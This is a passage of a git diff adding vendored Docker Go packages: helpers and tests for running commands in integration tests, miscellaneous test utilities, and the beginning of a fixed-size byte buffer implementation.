+	outBuffer *lockedBuffer
+	errBuffer *lockedBuffer
+}
+
+// Assert compares the Result against the Expected struct, and fails the test if
+// any of the expcetations are not met.
+func (r *Result) Assert(t testingT, exp Expected) {
+	err := r.Compare(exp)
+	if err == nil {
+		return
+	}
+
+	_, file, line, _ := runtime.Caller(1)
+	t.Fatalf("at %s:%d\n%s", filepath.Base(file), line, err.Error())
+}
+
+// Compare returns an formatted error with the command, stdout, stderr, exit
+// code, and any failed expectations
+func (r *Result) Compare(exp Expected) error {
+	errors := []string{}
+	add := func(format string, args ...interface{}) {
+		errors = append(errors, fmt.Sprintf(format, args...))
+	}
+
+	if exp.ExitCode != r.ExitCode {
+		add("ExitCode was %d expected %d", r.ExitCode, exp.ExitCode)
+	}
+	if exp.Timeout != r.Timeout {
+		if exp.Timeout {
+			add("Expected command to timeout")
+		} else {
+			add("Expected command to finish, but it hit the timeout")
+		}
+	}
+	if !matchOutput(exp.Out, r.Stdout()) {
+		add("Expected stdout to contain %q", exp.Out)
+	}
+	if !matchOutput(exp.Err, r.Stderr()) {
+		add("Expected stderr to contain %q", exp.Err)
+	}
+	switch {
+	// If a non-zero exit code is expected there is going to be an error.
+	// Don't require an error message as well as an exit code because the
+	// error message is going to be "exit status <code> which is not useful
+	case exp.Error == "" && exp.ExitCode != 0:
+	case exp.Error == "" && r.Error != nil:
+		add("Expected no error")
+	case exp.Error != "" && r.Error == nil:
+		add("Expected error to contain %q, but there was no error", exp.Error)
+	case exp.Error != "" && !strings.Contains(r.Error.Error(), exp.Error):
+		add("Expected error to contain %q", exp.Error)
+	}
+
+	if len(errors) == 0 {
+		return nil
+	}
+	return fmt.Errorf("%s\nFailures:\n%s\n", r, strings.Join(errors, "\n"))
+}
+
+func matchOutput(expected string, actual string) bool {
+	switch expected {
+	case None:
+		return actual == ""
+	default:
+		return strings.Contains(actual, expected)
+	}
+}
+
+func (r *Result) String() string {
+	var timeout string
+	if r.Timeout {
+		timeout = " (timeout)"
+	}
+
+	return fmt.Sprintf(`
+Command: %s
+ExitCode: %d%s, Error: %s
+Stdout: %v
+Stderr: %v
+`,
+		strings.Join(r.Cmd.Args, " "),
+		r.ExitCode,
+		timeout,
+		r.Error,
+		r.Stdout(),
+		r.Stderr())
+}
+
+// Expected is the expected output from a Command. This struct is compared to a
+// Result struct by Result.Assert().
+type Expected struct {
+	ExitCode int
+	Timeout  bool
+	Error    string
+	Out      string
+	Err      string
+}
+
+// Success is the default expected result
+var Success = Expected{}
+
+// Stdout returns the stdout of the process as a string
+func (r *Result) Stdout() string {
+	return r.outBuffer.String()
+}
+
+// Stderr returns the stderr of the process as a string
+func (r *Result) Stderr() string {
+	return r.errBuffer.String()
+}
+
+// Combined returns the stdout and stderr combined into a single string
+func (r *Result) Combined() string {
+	return r.outBuffer.String() + r.errBuffer.String()
+}
+
+// SetExitError sets Error and ExitCode based on Error
+func (r *Result) SetExitError(err error) {
+	if err == nil {
+		return
+	}
+	r.Error = err
+	r.ExitCode = system.ProcessExitCode(err)
+}
+
+type matches struct{}
+
+// Info returns the CheckerInfo
+func (m *matches) Info() *check.CheckerInfo {
+	return &check.CheckerInfo{
+		Name:   "CommandMatches",
+		Params: []string{"result", "expected"},
+	}
+}
+
+// Check compares a result against the expected
+func (m *matches) Check(params []interface{}, names []string) (bool, string) {
+	result, ok := params[0].(*Result)
+	if !ok {
+		return false, fmt.Sprintf("result must be a *Result, not %T", params[0])
+	}
+	expected, ok := params[1].(Expected)
+	if !ok {
+		return false, fmt.Sprintf("expected must be an Expected, not %T", params[1])
+	}
+
+	err := result.Compare(expected)
+	if err == nil {
+		return true, ""
+	}
+	return false, err.Error()
+}
+
+// Matches is a gocheck.Checker for comparing a Result against an Expected
+var Matches = &matches{}
+
+// Cmd contains the arguments and options for a process to run as part of a test
+// suite.
+type Cmd struct {
+	Command []string
+	Timeout time.Duration
+	Stdin   io.Reader
+	Stdout  io.Writer
+	Dir     string
+	Env     []string
+}
+
+// RunCmd runs a command and returns a Result
+func RunCmd(cmd Cmd) *Result {
+	result := StartCmd(cmd)
+	if result.Error != nil {
+		return result
+	}
+	return WaitOnCmd(cmd.Timeout, result)
+}
+
+// RunCommand parses a command line and runs it, returning a result
+func RunCommand(command string, args ...string) *Result {
+	return RunCmd(Cmd{Command: append([]string{command}, args...)})
+}
+
+// StartCmd starts a command, but doesn't wait for it to finish
+func StartCmd(cmd Cmd) *Result {
+	result := buildCmd(cmd)
+	if result.Error != nil {
+		return result
+	}
+	result.SetExitError(result.Cmd.Start())
+	return result
+}
+
+func buildCmd(cmd Cmd) *Result {
+	var execCmd *exec.Cmd
+	switch len(cmd.Command) {
+	case 1:
+		execCmd = exec.Command(cmd.Command[0])
+	default:
+		execCmd = exec.Command(cmd.Command[0], cmd.Command[1:]...)
+	}
+	outBuffer := new(lockedBuffer)
+	errBuffer := new(lockedBuffer)
+
+	execCmd.Stdin = cmd.Stdin
+	execCmd.Dir = cmd.Dir
+	execCmd.Env = cmd.Env
+	if cmd.Stdout != nil {
+		execCmd.Stdout = io.MultiWriter(outBuffer, cmd.Stdout)
+	} else {
+		execCmd.Stdout = outBuffer
+	}
+	execCmd.Stderr = errBuffer
+	return &Result{
+		Cmd:       execCmd,
+		outBuffer: outBuffer,
+		errBuffer: errBuffer,
+	}
+}
+
+// WaitOnCmd waits for a command to complete. If timeout is non-nil then
+// only wait until the timeout.
+func WaitOnCmd(timeout time.Duration, result *Result) *Result {
+	if timeout == time.Duration(0) {
+		result.SetExitError(result.Cmd.Wait())
+		return result
+	}
+
+	done := make(chan error, 1)
+	// Wait for command to exit in a goroutine
+	go func() {
+		done <- result.Cmd.Wait()
+	}()
+
+	select {
+	case <-time.After(timeout):
+		killErr := result.Cmd.Process.Kill()
+		if killErr != nil {
+			fmt.Printf("failed to kill (pid=%d): %v\n", result.Cmd.Process.Pid, killErr)
+		}
+		result.Timeout = true
+	case err := <-done:
+		result.SetExitError(err)
+	}
+	return result
+}
diff --git a/vendor/github.com/docker/docker/pkg/integration/cmd/command_test.go b/vendor/github.com/docker/docker/pkg/integration/cmd/command_test.go
new file mode 100644
index 0000000000..df23442079
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/integration/cmd/command_test.go
@@ -0,0 +1,118 @@
+package cmd
+
+import (
+	"runtime"
+	"strings"
+	"testing"
+	"time"
+
+	"github.com/docker/docker/pkg/testutil/assert"
+)
+
+func TestRunCommand(t *testing.T) {
+	// TODO Windows: Port this test
+	if runtime.GOOS == "windows" {
+		t.Skip("Needs porting to Windows")
+	}
+
+	var cmd string
+	if runtime.GOOS == "solaris" {
+		cmd = "gls"
+	} else {
+		cmd = "ls"
+	}
+	result := RunCommand(cmd)
+	result.Assert(t, Expected{})
+
+	result = RunCommand("doesnotexists")
+	expectedError := `exec: "doesnotexists": executable file not found`
+	result.Assert(t, Expected{ExitCode: 127, Error: expectedError})
+
+	result = RunCommand(cmd, "-z")
+	result.Assert(t, Expected{
+		ExitCode: 2,
+		Error:    "exit status 2",
+		Err:      "invalid option",
+	})
+	assert.Contains(t, result.Combined(), "invalid option")
+}
+
+func TestRunCommandWithCombined(t *testing.T) {
+	// TODO Windows: Port this test
+	if runtime.GOOS == "windows" {
+		t.Skip("Needs porting to Windows")
+	}
+
+	result := RunCommand("ls", "-a")
+	result.Assert(t, Expected{})
+
+	assert.Contains(t, result.Combined(), "..")
+	assert.Contains(t, result.Stdout(), "..")
+}
+
+func TestRunCommandWithTimeoutFinished(t *testing.T) {
+	// TODO Windows: Port this test
+	if runtime.GOOS == "windows" {
+		t.Skip("Needs porting to Windows")
+	}
+
+	result := RunCmd(Cmd{
+		Command: []string{"ls", "-a"},
+		Timeout: 50 * time.Millisecond,
+	})
+	result.Assert(t, Expected{Out: ".."})
+}
+
+func TestRunCommandWithTimeoutKilled(t *testing.T) {
+	// TODO Windows: Port this test
+	if runtime.GOOS == "windows" {
+		t.Skip("Needs porting to Windows")
+	}
+
+	command := []string{"sh", "-c", "while true ; do echo 1 ; sleep .5 ; done"}
+	result := RunCmd(Cmd{Command: command, Timeout: 1250 * time.Millisecond})
+	result.Assert(t, Expected{Timeout: true})
+
+	ones := strings.Split(result.Stdout(), "\n")
+	assert.Equal(t, len(ones), 4)
+}
+
+func TestRunCommandWithErrors(t *testing.T) {
+	result := RunCommand("/foobar")
+	result.Assert(t, Expected{Error: "foobar", ExitCode: 127})
+}
+
+func TestRunCommandWithStdoutStderr(t *testing.T) {
+	result := RunCommand("echo", "hello", "world")
+	result.Assert(t, Expected{Out: "hello world\n", Err: None})
+}
+
+func TestRunCommandWithStdoutStderrError(t *testing.T) {
+	result := RunCommand("doesnotexists")
+
+	expected := `exec: "doesnotexists": executable file not found`
+	result.Assert(t, Expected{Out: None, Err: None, ExitCode: 127, Error: expected})
+
+	switch runtime.GOOS {
+	case "windows":
+		expected = "ls: unknown option"
+	case "solaris":
+		expected = "gls: invalid option"
+	default:
+		expected = "ls: invalid option"
+	}
+
+	var cmd string
+	if runtime.GOOS == "solaris" {
+		cmd = "gls"
+	} else {
+		cmd = "ls"
+	}
+	result = RunCommand(cmd, "-z")
+	result.Assert(t, Expected{
+		Out:      None,
+		Err:      expected,
+		ExitCode: 2,
+		Error:    "exit status 2",
+	})
+}
diff --git a/vendor/github.com/docker/docker/pkg/integration/utils.go b/vendor/github.com/docker/docker/pkg/integration/utils.go
new file mode 100644
index 0000000000..f2089c43c4
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/integration/utils.go
@@ -0,0 +1,227 @@
+package integration
+
+import (
+	"archive/tar"
+	"errors"
+	"fmt"
+	"io"
+	"os"
+	"os/exec"
+	"path/filepath"
+	"reflect"
+	"strings"
+	"syscall"
+	"time"
+
+	icmd "github.com/docker/docker/pkg/integration/cmd"
+	"github.com/docker/docker/pkg/stringutils"
+	"github.com/docker/docker/pkg/system"
+)
+
+// IsKilled process the specified error and returns whether the process was killed or not.
+func IsKilled(err error) bool {
+	if exitErr, ok := err.(*exec.ExitError); ok {
+		status, ok := exitErr.Sys().(syscall.WaitStatus)
+		if !ok {
+			return false
+		}
+		// status.ExitStatus() is required on Windows because it does not
+		// implement Signal() nor Signaled(). Just check it had a bad exit
+		// status could mean it was killed (and in tests we do kill)
+		return (status.Signaled() && status.Signal() == os.Kill) || status.ExitStatus() != 0
+	}
+	return false
+}
+
+func runCommandWithOutput(cmd *exec.Cmd) (output string, exitCode int, err error) {
+	exitCode = 0
+	out, err := cmd.CombinedOutput()
+	exitCode = system.ProcessExitCode(err)
+	output = string(out)
+	return
+}
+
+// RunCommandPipelineWithOutput runs the array of commands with the output
+// of each pipelined with the following (like cmd1 | cmd2 | cmd3 would do).
+// It returns the final output, the exitCode different from 0 and the error
+// if something bad happened.
+func RunCommandPipelineWithOutput(cmds ...*exec.Cmd) (output string, exitCode int, err error) {
+	if len(cmds) < 2 {
+		return "", 0, errors.New("pipeline does not have multiple cmds")
+	}
+
+	// connect stdin of each cmd to stdout pipe of previous cmd
+	for i, cmd := range cmds {
+		if i > 0 {
+			prevCmd := cmds[i-1]
+			cmd.Stdin, err = prevCmd.StdoutPipe()
+
+			if err != nil {
+				return "", 0, fmt.Errorf("cannot set stdout pipe for %s: %v", cmd.Path, err)
+			}
+		}
+	}
+
+	// start all cmds except the last
+	for _, cmd := range cmds[:len(cmds)-1] {
+		if err = cmd.Start(); err != nil {
+			return "", 0, fmt.Errorf("starting %s failed with error: %v", cmd.Path, err)
+		}
+	}
+
+	defer func() {
+		var pipeErrMsgs []string
+		// wait all cmds except the last to release their resources
+		for _, cmd := range cmds[:len(cmds)-1] {
+			if pipeErr := cmd.Wait(); pipeErr != nil {
+				pipeErrMsgs = append(pipeErrMsgs, fmt.Sprintf("command %s failed with error: %v", cmd.Path, pipeErr))
+			}
+		}
+		if len(pipeErrMsgs) > 0 && err == nil {
+			err = fmt.Errorf("pipelineError from Wait: %v", strings.Join(pipeErrMsgs, ", "))
+		}
+	}()
+
+	// wait on last cmd
+	return runCommandWithOutput(cmds[len(cmds)-1])
+}
+
+// ConvertSliceOfStringsToMap converts a slices of string in a map
+// with the strings as key and an empty string as values.
+func ConvertSliceOfStringsToMap(input []string) map[string]struct{} {
+	output := make(map[string]struct{})
+	for _, v := range input {
+		output[v] = struct{}{}
+	}
+	return output
+}
+
+// CompareDirectoryEntries compares two sets of FileInfo (usually taken from a directory)
+// and returns an error if different.
+func CompareDirectoryEntries(e1 []os.FileInfo, e2 []os.FileInfo) error {
+	var (
+		e1Entries = make(map[string]struct{})
+		e2Entries = make(map[string]struct{})
+	)
+	for _, e := range e1 {
+		e1Entries[e.Name()] = struct{}{}
+	}
+	for _, e := range e2 {
+		e2Entries[e.Name()] = struct{}{}
+	}
+	if !reflect.DeepEqual(e1Entries, e2Entries) {
+		return fmt.Errorf("entries differ")
+	}
+	return nil
+}
+
+// ListTar lists the entries of a tar.
+func ListTar(f io.Reader) ([]string, error) {
+	tr := tar.NewReader(f)
+	var entries []string
+
+	for {
+		th, err := tr.Next()
+		if err == io.EOF {
+			// end of tar archive
+			return entries, nil
+		}
+		if err != nil {
+			return entries, err
+		}
+		entries = append(entries, th.Name)
+	}
+}
+
+// RandomTmpDirPath provides a temporary path with rand string appended.
+// does not create or checks if it exists.
+func RandomTmpDirPath(s string, platform string) string {
+	tmp := "/tmp"
+	if platform == "windows" {
+		tmp = os.Getenv("TEMP")
+	}
+	path := filepath.Join(tmp, fmt.Sprintf("%s.%s", s, stringutils.GenerateRandomAlphaOnlyString(10)))
+	if platform == "windows" {
+		return filepath.FromSlash(path) // Using \
+	}
+	return filepath.ToSlash(path) // Using /
+}
+
+// ConsumeWithSpeed reads chunkSize bytes from reader before sleeping
+// for interval duration. Returns total read bytes. Send true to the
+// stop channel to return before reading to EOF on the reader.
+func ConsumeWithSpeed(reader io.Reader, chunkSize int, interval time.Duration, stop chan bool) (n int, err error) {
+	buffer := make([]byte, chunkSize)
+	for {
+		var readBytes int
+		readBytes, err = reader.Read(buffer)
+		n += readBytes
+		if err != nil {
+			if err == io.EOF {
+				err = nil
+			}
+			return
+		}
+		select {
+		case <-stop:
+			return
+		case <-time.After(interval):
+		}
+	}
+}
+
+// ParseCgroupPaths parses 'procCgroupData', which is output of '/proc/<pid>/cgroup', and returns
+// a map which cgroup name as key and path as value.
+func ParseCgroupPaths(procCgroupData string) map[string]string {
+	cgroupPaths := map[string]string{}
+	for _, line := range strings.Split(procCgroupData, "\n") {
+		parts := strings.Split(line, ":")
+		if len(parts) != 3 {
+			continue
+		}
+		cgroupPaths[parts[1]] = parts[2]
+	}
+	return cgroupPaths
+}
+
+// ChannelBuffer holds a chan of byte array that can be populate in a goroutine.
+type ChannelBuffer struct {
+	C chan []byte
+}
+
+// Write implements Writer.
+func (c *ChannelBuffer) Write(b []byte) (int, error) {
+	c.C <- b
+	return len(b), nil
+}
+
+// Close closes the go channel.
+func (c *ChannelBuffer) Close() error {
+	close(c.C)
+	return nil
+}
+
+// ReadTimeout reads the content of the channel in the specified byte array with
+// the specified duration as timeout.
+func (c *ChannelBuffer) ReadTimeout(p []byte, n time.Duration) (int, error) {
+	select {
+	case b := <-c.C:
+		return copy(p[0:], b), nil
+	case <-time.After(n):
+		return -1, fmt.Errorf("timeout reading from channel")
+	}
+}
+
+// RunAtDifferentDate runs the specified function with the given time.
+// It changes the date of the system, which can led to weird behaviors.
+func RunAtDifferentDate(date time.Time, block func()) {
+	// Layout for date. MMDDhhmmYYYY
+	const timeLayout = "010203042006"
+	// Ensure we bring time back to now
+	now := time.Now().Format(timeLayout)
+	defer icmd.RunCommand("date", now)
+
+	icmd.RunCommand("date", date.Format(timeLayout))
+	block()
+	return
+}
diff --git a/vendor/github.com/docker/docker/pkg/integration/utils_test.go b/vendor/github.com/docker/docker/pkg/integration/utils_test.go
new file mode 100644
index 0000000000..0b2ef4aff5
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/integration/utils_test.go
@@ -0,0 +1,363 @@
+package integration
+
+import (
+	"io"
+	"io/ioutil"
+	"os"
+	"os/exec"
+	"path/filepath"
+	"runtime"
+	"strings"
+	"testing"
+	"time"
+)
+
+func TestIsKilledFalseWithNonKilledProcess(t *testing.T) {
+	var lsCmd *exec.Cmd
+	if runtime.GOOS != "windows" {
+		lsCmd = exec.Command("ls")
+	} else {
+		lsCmd = exec.Command("cmd", "/c", "dir")
+	}
+
+	err := lsCmd.Run()
+	if IsKilled(err) {
+		t.Fatalf("Expected the ls command to not be killed, was.")
+	}
+}
+
+func TestIsKilledTrueWithKilledProcess(t *testing.T) {
+	var longCmd *exec.Cmd
+	if runtime.GOOS != "windows" {
+		longCmd = exec.Command("top")
+	} else {
+		longCmd = exec.Command("powershell", "while ($true) { sleep 1 }")
+	}
+
+	// Start a command
+	err := longCmd.Start()
+	if err != nil {
+		t.Fatal(err)
+	}
+	// Capture the error when *dying*
+	done := make(chan error, 1)
+	go func() {
+		done <- longCmd.Wait()
+	}()
+	// Then kill it
+	longCmd.Process.Kill()
+	// Get the error
+	err = <-done
+	if !IsKilled(err) {
+		t.Fatalf("Expected the command to be killed, was not.")
+	}
+}
+
+func TestRunCommandPipelineWithOutputWithNotEnoughCmds(t *testing.T) {
+	_, _, err := RunCommandPipelineWithOutput(exec.Command("ls"))
+	expectedError := "pipeline does not have multiple cmds"
+	if err == nil || err.Error() != expectedError {
+		t.Fatalf("Expected an error with %s, got err:%s", expectedError, err)
+	}
+}
+
+func TestRunCommandPipelineWithOutputErrors(t *testing.T) {
+	p := "$PATH"
+	if runtime.GOOS == "windows" {
+		p = "%PATH%"
+	}
+	cmd1 := exec.Command("ls")
+	cmd1.Stdout = os.Stdout
+	cmd2 := exec.Command("anything really")
+	_, _, err := RunCommandPipelineWithOutput(cmd1, cmd2)
+	if err == nil || err.Error() != "cannot set stdout pipe for anything really: exec: Stdout already set" {
+		t.Fatalf("Expected an error, got %v", err)
+	}
+
+	cmdWithError := exec.Command("doesnotexists")
+	cmdCat := exec.Command("cat")
+	_, _, err = RunCommandPipelineWithOutput(cmdWithError, cmdCat)
+	if err == nil || err.Error() != `starting doesnotexists failed with error: exec: "doesnotexists": executable file not found in `+p {
+		t.Fatalf("Expected an error, got %v", err)
+	}
+}
+
+func TestRunCommandPipelineWithOutput(t *testing.T) {
+	//TODO: Should run on Solaris
+	if runtime.GOOS == "solaris" {
+		t.Skip()
+	}
+	cmds := []*exec.Cmd{
+		// Print 2 characters
+		exec.Command("echo", "-n", "11"),
+		// Count the number or char from stdin (previous command)
+		exec.Command("wc", "-m"),
+	}
+	out, exitCode, err := RunCommandPipelineWithOutput(cmds...)
+	expectedOutput := "2\n"
+	if out != expectedOutput || exitCode != 0 || err != nil {
+		t.Fatalf("Expected %s for commands %v, got out:%s, exitCode:%d, err:%v", expectedOutput, cmds, out, exitCode, err)
+	}
+}
+
+func TestConvertSliceOfStringsToMap(t *testing.T) {
+	input := []string{"a", "b"}
+	actual := ConvertSliceOfStringsToMap(input)
+	for _, key := range input {
+		if _, ok := actual[key]; !ok {
+			t.Fatalf("Expected output to contains key %s, did not: %v", key, actual)
+		}
+	}
+}
+
+func TestCompareDirectoryEntries(t *testing.T) {
+	tmpFolder, err := ioutil.TempDir("", "integration-cli-utils-compare-directories")
+	if err != nil {
+		t.Fatal(err)
+	}
+	defer os.RemoveAll(tmpFolder)
+
+	file1 := filepath.Join(tmpFolder, "file1")
+	file2 := filepath.Join(tmpFolder, "file2")
+	os.Create(file1)
+	os.Create(file2)
+
+	fi1, err := os.Stat(file1)
+	if err != nil {
+		t.Fatal(err)
+	}
+	fi1bis, err := os.Stat(file1)
+	if err != nil {
+		t.Fatal(err)
+	}
+	fi2, err := os.Stat(file2)
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	cases := []struct {
+		e1          []os.FileInfo
+		e2          []os.FileInfo
+		shouldError bool
+	}{
+		// Empty directories
+		{
+			[]os.FileInfo{},
+			[]os.FileInfo{},
+			false,
+		},
+		// Same FileInfos
+		{
+			[]os.FileInfo{fi1},
+			[]os.FileInfo{fi1},
+			false,
+		},
+		// Different FileInfos but same names
+		{
+			[]os.FileInfo{fi1},
+			[]os.FileInfo{fi1bis},
+			false,
+		},
+		// Different FileInfos, different names
+		{
+			[]os.FileInfo{fi1},
+			[]os.FileInfo{fi2},
+			true,
+		},
+	}
+	for _, elt := range cases {
+		err := CompareDirectoryEntries(elt.e1, elt.e2)
+		if elt.shouldError && err == nil {
+			t.Fatalf("Should have return an error, did not with %v and %v", elt.e1, elt.e2)
+		}
+		if !elt.shouldError && err != nil {
+			t.Fatalf("Should have not returned an error, but did : %v with %v and %v", err, elt.e1, elt.e2)
+		}
+	}
+}
+
+// FIXME make an "unhappy path" test for ListTar without "panicking" :-)
+func TestListTar(t *testing.T) {
+	// TODO Windows: Figure out why this fails. Should be portable.
+	if runtime.GOOS == "windows" {
+		t.Skip("Failing on Windows - needs further investigation")
+	}
+	tmpFolder, err := ioutil.TempDir("", "integration-cli-utils-list-tar")
+	if err != nil {
+		t.Fatal(err)
+	}
+	defer os.RemoveAll(tmpFolder)
+
+	// Let's create a Tar file
+	srcFile := filepath.Join(tmpFolder, "src")
+	tarFile := filepath.Join(tmpFolder, "src.tar")
+	os.Create(srcFile)
+	cmd := exec.Command("sh", "-c", "tar cf "+tarFile+" "+srcFile)
+	_, err = cmd.CombinedOutput()
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	reader, err := os.Open(tarFile)
+	if err != nil {
+		t.Fatal(err)
+	}
+	defer reader.Close()
+
+	entries, err := ListTar(reader)
+	if err != nil {
+		t.Fatal(err)
+	}
+	if len(entries) != 1 && entries[0] != "src" {
+		t.Fatalf("Expected a tar file with 1 entry (%s), got %v", srcFile, entries)
+	}
+}
+
+func TestRandomTmpDirPath(t *testing.T) {
+	path := RandomTmpDirPath("something", runtime.GOOS)
+
+	prefix := "/tmp/something"
+	if runtime.GOOS == "windows" {
+		prefix = os.Getenv("TEMP") + `\something`
+	}
+	expectedSize := len(prefix) + 11
+
+	if !strings.HasPrefix(path, prefix) {
+		t.Fatalf("Expected generated path to have '%s' as prefix, got %s'", prefix, path)
+	}
+	if len(path) != expectedSize {
+		t.Fatalf("Expected generated path to be %d, got %d", expectedSize, len(path))
+	}
+}
+
+func TestConsumeWithSpeed(t *testing.T) {
+	reader := strings.NewReader("1234567890")
+	chunksize := 2
+
+	bytes1, err := ConsumeWithSpeed(reader, chunksize, 1*time.Second, nil)
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	if bytes1 != 10 {
+		t.Fatalf("Expected to have read 10 bytes, got %d", bytes1)
+	}
+
+}
+
+func TestConsumeWithSpeedWithStop(t *testing.T) {
+	reader := strings.NewReader("1234567890")
+	chunksize := 2
+
+	stopIt := make(chan bool)
+
+	go func() {
+		time.Sleep(1 * time.Millisecond)
+		stopIt <- true
+	}()
+
+	bytes1, err := ConsumeWithSpeed(reader, chunksize, 20*time.Millisecond, stopIt)
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	if bytes1 != 2 {
+		t.Fatalf("Expected to have read 2 bytes, got %d", bytes1)
+	}
+
+}
+
+func TestParseCgroupPathsEmpty(t *testing.T) {
+	cgroupMap := ParseCgroupPaths("")
+	if len(cgroupMap) != 0 {
+		t.Fatalf("Expected an empty map, got %v", cgroupMap)
+	}
+	cgroupMap = ParseCgroupPaths("\n")
+	if len(cgroupMap) != 0 {
+		t.Fatalf("Expected an empty map, got %v", cgroupMap)
+	}
+	cgroupMap = ParseCgroupPaths("something:else\nagain:here")
+	if len(cgroupMap) != 0 {
+		t.Fatalf("Expected an empty map, got %v", cgroupMap)
+	}
+}
+
+func TestParseCgroupPaths(t *testing.T) {
+	cgroupMap := ParseCgroupPaths("2:memory:/a\n1:cpuset:/b")
+	if len(cgroupMap) != 2 {
+		t.Fatalf("Expected a map with 2 entries, got %v", cgroupMap)
+	}
+	if value, ok := cgroupMap["memory"]; !ok || value != "/a" {
+		t.Fatalf("Expected cgroupMap to contains an entry for 'memory' with value '/a', got %v", cgroupMap)
+	}
+	if value, ok := cgroupMap["cpuset"]; !ok || value != "/b" {
+		t.Fatalf("Expected cgroupMap to contains an entry for 'cpuset' with value '/b', got %v", cgroupMap)
+	}
+}
+
+func TestChannelBufferTimeout(t *testing.T) {
+	expected := "11"
+
+	buf := &ChannelBuffer{make(chan []byte, 1)}
+	defer buf.Close()
+
+	done := make(chan struct{}, 1)
+	go func() {
+		time.Sleep(100 * time.Millisecond)
+		io.Copy(buf, strings.NewReader(expected))
+		done <- struct{}{}
+	}()
+
+	// Wait long enough
+	b := make([]byte, 2)
+	_, err := buf.ReadTimeout(b, 50*time.Millisecond)
+	if err == nil && err.Error() != "timeout reading from channel" {
+		t.Fatalf("Expected an error, got %s", err)
+	}
+	<-done
+}
+
+func TestChannelBuffer(t *testing.T) {
+	expected := "11"
+
+	buf := &ChannelBuffer{make(chan []byte, 1)}
+	defer buf.Close()
+
+	go func() {
+		time.Sleep(100 * time.Millisecond)
+		io.Copy(buf, strings.NewReader(expected))
+	}()
+
+	// Wait long enough
+	b := make([]byte, 2)
+	_, err := buf.ReadTimeout(b, 200*time.Millisecond)
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	if string(b) != expected {
+		t.Fatalf("Expected '%s', got '%s'", expected, string(b))
+	}
+}
+
+// FIXME doesn't work
+// func TestRunAtDifferentDate(t *testing.T) {
+// 	var date string
+
+// 	// Layout for date. MMDDhhmmYYYY
+// 	const timeLayout = "20060102"
+// 	expectedDate := "20100201"
+// 	theDate, err := time.Parse(timeLayout, expectedDate)
+// 	if err != nil {
+// 		t.Fatal(err)
+// 	}
+
+// 	RunAtDifferentDate(theDate, func() {
+// 		cmd := exec.Command("date", "+%Y%M%d")
+// 		out, err := cmd.Output()
+// 		if err != nil {
+// 			t.Fatal(err)
+// 		}
+// 		date = string(out)
+// 	})
+// }
diff --git a/vendor/github.com/docker/docker/pkg/ioutils/buffer.go b/vendor/github.com/docker/docker/pkg/ioutils/buffer.go
new file mode 100644
index 0000000000..3d737b3e19
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/ioutils/buffer.go
@@ -0,0 +1,51 @@
+package ioutils
+
+import (
+	"errors"
+	"io"
+)
+
+var errBufferFull = errors.New("buffer is full")
+
+type fixedBuffer struct {
+	buf      []byte
+	pos      int
+	lastRead int
+}
+
+func (b *fixedBuffer) Write(p []byte) (int, error) {
+	n := copy(b.buf[b.pos:cap(b.buf)], p)
+	b.pos += n
+
+	if n < len(p) {
+		if b.pos == cap(b.buf) {
+			return n, errBufferFull
+		}
+		return n, io.ErrShortWrite
+	}
+	return n, nil
+}
+
+func (b *fixedBuffer) Read(p []byte) (int, error) {
+	n := copy(p, b.buf[b.lastRead:b.pos])
+	b.lastRead += n
+	return n, nil
+}
+
+func (b *fixedBuffer) Len() int {
+	return b.pos - b.lastRead
+}
+
+func (b *fixedBuffer) Cap() int {
+	return cap(b.buf)
+}
+
+func (b *fixedBuffer) Reset() {
+	b.pos = 0
+	b.lastRead = 0
+	b.buf = b.buf[:0]
+}
+
+func (b *fixedBuffer) String() string {
+	return string(b.buf[b.lastRead:b.pos])
+}
diff --git a/vendor/github.com/docker/docker/pkg/ioutils/buffer_test.go b/vendor/github.com/docker/docker/pkg/ioutils/buffer_test.go
new file mode 100644
index 0000000000..41098fa6e7
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/ioutils/buffer_test.go
@@ -0,0 +1,75 @@
+package ioutils
+
+import (
+	"bytes"
+	"testing"
+)
+
+func TestFixedBufferWrite(t *testing.T) {
+	buf := &fixedBuffer{buf: make([]byte, 0, 64)}
+	n, err := buf.Write([]byte("hello"))
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	if n != 5 {
+		t.Fatalf("expected 5 bytes written, got %d", n)
+	}
+
+	if string(buf.buf[:5]) != "hello" {
+		t.Fatalf("expected \"hello\", got %q", string(buf.buf[:5]))
+	}
+
+	n, err = buf.Write(bytes.Repeat([]byte{1}, 64))
+	if err != errBufferFull {
+		t.Fatalf("expected errBufferFull, got %v - %v", err, buf.buf[:64])
+	}
+}
+
+func TestFixedBufferRead(t *testing.T) {
+	buf := &fixedBuffer{buf: make([]byte, 0, 64)}
+	if _, err := buf.Write([]byte("hello world")); err != nil {
+		t.Fatal(err)
+	}
+
+	b := make([]byte, 5)
+	n, err := buf.Read(b)
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	if n != 5 {
+		t.Fatalf("expected 5 bytes read, got %d - %s", n, buf.String())
+	}
+
+	if string(b) != "hello" {
+		t.Fatalf("expected \"hello\", got %q", string(b))
+	}
+
+	n, err = buf.Read(b)
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	if n != 5 {
+		t.Fatalf("expected 5 bytes read, got %d", n)
+	}
+
+	if string(b) != " worl" {
+		t.Fatalf("expected \" worl\", got %s", string(b))
+	}
+
+	b = b[:1]
+	n, err = buf.Read(b)
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	if n != 1 {
+		t.Fatalf("expected 1 byte read, got %d - %s", n, buf.String())
+	}
+
+	if string(b) != "d" {
+		t.Fatalf("expected \"d\", got %s", string(b))
+	}
+}
diff --git a/vendor/github.com/docker/docker/pkg/ioutils/bytespipe.go b/vendor/github.com/docker/docker/pkg/ioutils/bytespipe.go
new file mode 100644
index 0000000000..72a04f3491
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/ioutils/bytespipe.go
@@ -0,0 +1,186 @@
+package ioutils
+
+import (
+	"errors"
+	"io"
+	"sync"
+)
+
+// maxCap is the highest capacity to use in byte slices that buffer data.
+const maxCap = 1e6
+
+// minCap is the lowest capacity to use in byte slices that buffer data
